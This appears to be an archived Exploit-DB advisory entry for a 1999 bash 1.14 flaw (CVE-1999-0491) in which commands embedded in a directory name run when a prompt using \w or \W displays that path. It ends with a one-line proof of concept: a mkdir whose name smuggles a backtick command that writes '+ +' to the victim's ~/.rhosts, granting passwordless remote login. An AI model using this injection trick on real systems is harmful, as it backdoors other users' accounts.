GNU GNU bash 1.14 Path Embedded Code Execution Vulnerability

1999-04-20T00:00:00
ID EDB-ID:19095
Type exploitdb
Reporter Shadow
Modified 1999-04-20T00:00:00

Description

GNU GNU bash 1.14 Path Embedded Code Execution Vulnerability. CVE-1999-0491. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/119/info

A vulnerability in bash may allow inadvertently running commands embedded in the path to the currently working directory.

If an unsuspecting user enters a directory created by some malicious user with embedded commands, and their prompt (PS1) contains '\w' or '\W', and the prompt is displayed the commands will be executed. The vulnerability is in the parsing of the '\w' and '\W' escape codes.

As the prompt must be displayed unattended shell scripts are not vulnerable.

mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\` "